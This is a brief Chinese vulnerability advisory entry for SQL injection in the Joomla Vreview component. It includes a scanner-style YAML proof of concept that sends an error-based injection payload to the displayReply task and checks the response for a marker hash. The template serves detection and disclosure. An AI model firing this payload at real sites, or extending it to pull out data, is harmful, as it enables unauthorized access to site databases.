joomla-component-vreview-sql: Joomla Component Vreview sql

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Joomla Component Vreview 存在SQL注入漏洞

PoC代码[已公开]

id: joomla-component-vreview-sql

info:
  name: Joomla Component Vreview sql
  author: 南方有梦
  severity: high
  verified: true
  description: |-
    Joomla Component Vreview 存在SQL注入漏洞
  tags: joomla,component,vrreview,sql
  created: 2024/02/29

set:
  r1: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: POST
      path: /index.php?option=com_vreview&task=displayReply
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
      follow_redirects: true
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()